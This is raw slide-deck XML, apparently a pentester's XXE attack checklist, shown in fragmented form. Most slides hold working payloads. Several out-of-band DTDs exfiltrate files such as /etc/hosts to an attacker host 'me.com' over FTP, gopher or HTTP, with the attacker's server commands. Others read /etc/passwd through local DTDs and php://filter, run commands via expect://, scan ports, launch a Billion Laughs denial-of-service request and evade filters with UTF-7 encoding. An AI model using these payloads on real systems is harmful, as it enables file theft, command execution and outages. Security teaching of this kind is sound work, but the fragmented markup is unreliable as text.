        <p:nvSpPr>
          <p:cNvPr id="518" name="Google Shape;518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9" name="Google Shape;519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5" name="Google Shape;525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DTD File Contains FTP Server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27" name="Google Shape;52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5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encoding="UTF-8"?&gt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [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&lt;!ENTITY % read SYSTEM "file:///"&gt;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send SYSTEM "https://me.com:9001/ftp.dtd"&gt;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%send;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529" name="Google Shape;529;p65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0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root@mine:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="750">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="750">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="750">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat ftp.dtd</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="7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00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="7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00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;!ENTITY % all "&lt;!ENTITY pwnfromME SYSTEM 'ftp://test:%read;@me.com:PORT/'&gt;"&gt; %all;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="7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0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root@mine:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="750">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="750">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="750">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>python -m http.server 9001</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="7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">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root@mine:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="750">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="750">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="750">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ruby ftp_server.rb</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="750">
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530" name="Google Shape;530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31" name="Google Shape;531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50" y="2675525"/>
            <a:ext cx="49055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7" name="Google Shape;537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DTD File Contains FTP Server II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39" name="Google Shape;5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66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encoding="UTF-8"?&gt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [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send SYSTEM "https://me.com/ftp.dtd"&gt;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%send;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%all;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541" name="Google Shape;541;p66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ftp.dtd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read SYSTEM 'file:///etc/hosts"&gt;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all "&lt;!ENTITY pwnfromME SYSTEM 'ftp://me.com:PORT:/_%read;'&gt;"&gt;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ruby ftp_server.rb</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="542" name="Google Shape;542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3" name="Google Shape;543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5" name="Google Shape;545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6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7" name="Google Shape;547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3" name="Google Shape;553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Reading From Remote DTD File Contains Gopher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lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="555" name="Google Shape;55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7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encoding="UTF-8"?&gt;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root [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read SYSTEM 'file:///etc/hosts"&gt;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send SYSTEM "https://me.com/gopher.dtd"&gt;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%send;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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;pwnfromME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557" name="Google Shape;557;p67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gopher.dtd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all "&lt;!ENTITY pwnfromME SYSTEM '</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gopher://me.com:80/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%read;'&gt;"&gt;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%all;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tcpdump -A src host www.compant.com and port 80 and greater 1000</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="558" name="Google Shape;558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9" name="Google Shape;55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65" name="Google Shape;565;p6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Try To Use Local DTD Files To Read Local Files e.g. etc/passwd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67" name="Google Shape;56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8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?&gt;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&lt;!DOCTYPE root [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&lt;!ENTITY % local_dtd SYSTEM "file:///</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="00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FUZZ-Here-To-GET-Path</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/Local-File.dtd"&gt;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&lt;!ENTITY % condition 'aaa)&gt;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    &lt;!ENTITY &amp;#x25; file SYSTEM "file:///etc/passwd"&gt;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           &lt;!ENTITY &amp;#x25; eval "&lt;!ENTITY &amp;#x26;#x25; error SYSTEM &amp;#x27;file:///nonexistent/&amp;#x25;file;&amp;#x27;&gt;"&gt;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    &amp;#x25;eval;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    &amp;#x25;error;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    &lt;!ELEMENT aa (bb'&gt;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   %local_dtd;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&lt;email&gt;me@gmail.com&lt;/email&gt;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569" name="Google Shape;569;p6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0" name="Google Shape;570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9250" y="2675525"/>
            <a:ext cx="49055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6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2" name="Google Shape;572;p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Read Local Files e.g. &lt;!DOCTYPE name [ &lt;!ENTITY read SYSTEM "file:///etc/passwd"&gt;]&gt;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7" name="Google Shape;227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root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SYSTEM "file:///etc/passwd"&gt;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28" name="Google Shape;228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9" name="Google Shape;229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5" name="Google Shape;23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763" y="3093288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7" name="Google Shape;237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5023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8" name="Google Shape;578;p6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Use Open Redirection To Read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>From Remote DTD File</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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80" name="Google Shape;58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69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br>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:b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&lt;?xml version="1.0" encoding="UTF-8"?&gt;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root [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send SYSTEM "https://company.com/open?url=http://me.com/file.dtd"&gt;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%send;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%all;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&amp;pwnfromME;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582" name="Google Shape;582;p69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3205300" y="1581400"/>
            <a:ext cx="4835100" cy="6705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B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root@mine:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat file.dtd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read SYSTEM 'file:///etc/hosts"&gt;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% all "&lt;!ENTITY pwnfromME SYSTEM 'file:///test/_%read;'&gt;"&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="583" name="Google Shape;583;p6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4" name="Google Shape;5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>
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Some Wrappers e.g.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> php://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data://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phar:// OR rar:// </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>By Using</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. &lt;!DOCTYPE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 name [ &lt;!ENTITY  SYSTEM "</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php://filter/convert.base64- encode/resource=/etc/passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;]&gt;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root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SYSTEM "</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php://filter/convert.base64-encode/resource=/etc/passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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591" name="Google Shape;591;p7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92" name="Google Shape;592;p7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94" name="Google Shape;59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6" name="Google Shape;596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7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8" name="Google Shape;598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250" y="3078050"/>
            <a:ext cx="49055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0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0" name="Google Shape;600;p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050" y="3534900"/>
            <a:ext cx="452925" cy="36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>
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Some Wrappers e.g.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> php:// </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data://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phar:// OR rar://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standalone="no" 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&lt;?xml version="1.0" encoding="UTF-8" standalone="no"?&gt;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06" name="Google Shape;606;p7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encoding="UTF-8" standalone="no"?&gt;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root [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SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"&gt;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r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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607" name="Google Shape;607;p7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8" name="Google Shape;608;p7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10" name="Google Shape;61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7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2" name="Google Shape;61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PUBLIC Instead Of SYSTEM With </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Some Wrappers e.g.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> php:// , data:// , phar:// OR rar:// </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>By Using</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. &lt;!DOCTYPE name [ &lt;!ENTITY  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PUBLIC</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "php://filter/convert.base64- encode/resource=/etc/passwd"&gt;]&gt;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18" name="Google Shape;618;p7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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PUBLIC</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "php://filter/convert.base64-encode/resource=/etc/passwd"&gt;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r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="7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19" name="Google Shape;619;p7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0" name="Google Shape;620;p7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22" name="Google Shape;62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7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4" name="Google Shape;624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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>expect </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wrapper</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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 &lt;!DOCTYPE name [ &lt;!ENTITY  SYSTEM "expect://CMD"&gt;]&gt;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30" name="Google Shape;630;p7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root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SYSTEM "expect://id"&gt;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r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>read</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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31" name="Google Shape;631;p7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2" name="Google Shape;632;p7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4" name="Google Shape;63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6" name="Google Shape;636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38" name="Google Shape;638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expect Wrapper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standalone="no" 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&lt;?xml version="1.0" encoding="UTF-8" standalone="no"?&gt;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44" name="Google Shape;644;p7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encoding="UTF-8" standalone="no"?&gt;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root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SYSTEM "expect://id"&gt;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r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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700">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="645" name="Google Shape;645;p7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6" name="Google Shape;646;p7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48" name="Google Shape;64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7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50" name="Google Shape;65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PUBLIC Instead Of SYSTEM With </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>expect Wrapper</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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 &lt;!DOCTYPE name [ &lt;!ENTITY  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PUBLIC</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "expect://CMD"&gt;]&gt;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56" name="Google Shape;656;p7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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PUBLIC</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "expect://id"&gt;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r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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57" name="Google Shape;657;p7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58" name="Google Shape;658;p7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60" name="Google Shape;66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7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2" name="Google Shape;662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PORT Scanning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By Using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&lt;!DOCTYPE name [ &lt;!ENTITY  SYSTEM "http://comapny.com:PORT"&gt;]&gt;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68" name="Google Shape;668;p7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SYSTEM "http://company.com/PORT"&gt;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69" name="Google Shape;669;p7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0" name="Google Shape;670;p7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72" name="Google Shape;67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4" name="Google Shape;67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PORT Scanning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standalone="no" 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&lt;?xml version="1.0" encoding="UTF-8" standalone="no"?&gt;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80" name="Google Shape;680;p7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encoding="UTF-8" standalone="no"?&gt;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SYSTEM "http://company.com/PORT"&gt;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681" name="Google Shape;681;p7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2" name="Google Shape;682;p7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84" name="Google Shape;68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7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6" name="Google Shape;686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PUBLIC Instead Of SYSTEM To Do PORT Scanning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By Using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&lt;!DOCTYPE name [ &lt;!ENTITY  PUBLIC "http://comapny.com:PORT"&gt;]&gt;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92" name="Google Shape;692;p7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PUBLIC "http://company.com/PORT"&gt;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693" name="Google Shape;693;p7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4" name="Google Shape;694;p7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96" name="Google Shape;69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7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98" name="Google Shape;698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Read Local Files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standalone="no" </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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&lt;?xml version="1.0" encoding="UTF-8" standalone="no"?&gt;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 encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="UTF-8"</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> standalone="no"?&gt;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SYSTEM "file:///etc/passwd"&gt;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44" name="Google Shape;244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5" name="Google Shape;245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>
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Do </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> aka </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Billion Laughs Attack</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="704" name="Google Shape;704;p7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POST /xml-body HTTP/1.1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Host: www.company.com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Content-Type: application/xml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Content-Length: Number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&lt;?xml version="1.0"?&gt;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&lt;!DOCTYPE root [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 "lol"&gt;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&lt;!ELEMENT root (#PCDATA)&gt;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lol1 "&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;"&gt;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lol2 "&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;"&gt;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lol3 "&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;"&gt;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lol4 "&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;"&gt;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lol5 "&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;"&gt;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lol6 "&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;"&gt;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]&gt;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&lt;root&gt;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      &lt;email&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="600">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;lol6;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="600">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/email&gt;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      &lt;password&gt;*********&lt;/password&gt;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&lt;/root&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="600">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="705" name="Google Shape;705;p7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6" name="Google Shape;706;p7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08" name="Google Shape;70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0" name="Google Shape;710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9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2" name="Google Shape;712;p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5023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7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14" name="Google Shape;714;p7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0750" y="3093288"/>
            <a:ext cx="467526" cy="3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Do DOS aka Billion Laughs Attack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standalone="no" e.g.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&lt;?xml version="1.0" encoding="UTF-8" standalone="no"?&gt;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20" name="Google Shape;720;p8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POST /xml-body HTTP/1.1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Host: www.company.com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Content-Type: application/xml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Content-Length: Number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&lt;?xml version="1.0" encoding="UTF-8" standalone="no"?&gt;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&lt;!DOCTYPE root [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 "lol"&gt;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&lt;!ELEMENT root (#PCDATA)&gt;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lol1 "&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;"&gt;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lol2 "&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;"&gt;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lol3 "&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;"&gt;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lol4 "&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;"&gt;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lol5 "&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;"&gt;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 &lt;!ENTITY lol6 "&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;"&gt;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0FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="6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&lt;root&gt;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      &lt;email&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="600">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;lol6;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="600">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/email&gt;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      &lt;password&gt;*********&lt;/password&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="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721" name="Google Shape;721;p8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22" name="Google Shape;722;p8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8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24" name="Google Shape;72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8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26" name="Google Shape;726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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Encoding UTF-7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UTF-16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UTF-16BE </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Instead Of</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Encoding UTF-8 e.g. &lt;?xml version="1.0" encoding="UTF-7" standalone="no"?&gt; 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732" name="Google Shape;732;p8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payload='</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;!DOCTYPE root [ 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&lt;!ENTITY read SYSTEM "file:///etc/passwd"&gt;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]&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'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echo $payload | iconv -f UTF-8 -t UTF-7 | tee -a UTF-7-Payload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3 - Use Content Of UTF-7-payload In Your Request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&lt;?xml version="1.0" encoding="UTF-7" standalone="no"?&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200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00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content Of UTF-7-payload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733" name="Google Shape;733;p8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34" name="Google Shape;734;p8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36" name="Google Shape;73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8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38" name="Google Shape;738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8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740" name="Google Shape;740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2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82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47" name="Google Shape;747;p82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48" name="Google Shape;74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82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82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82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PUBLIC Instead Of SYSTEM To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
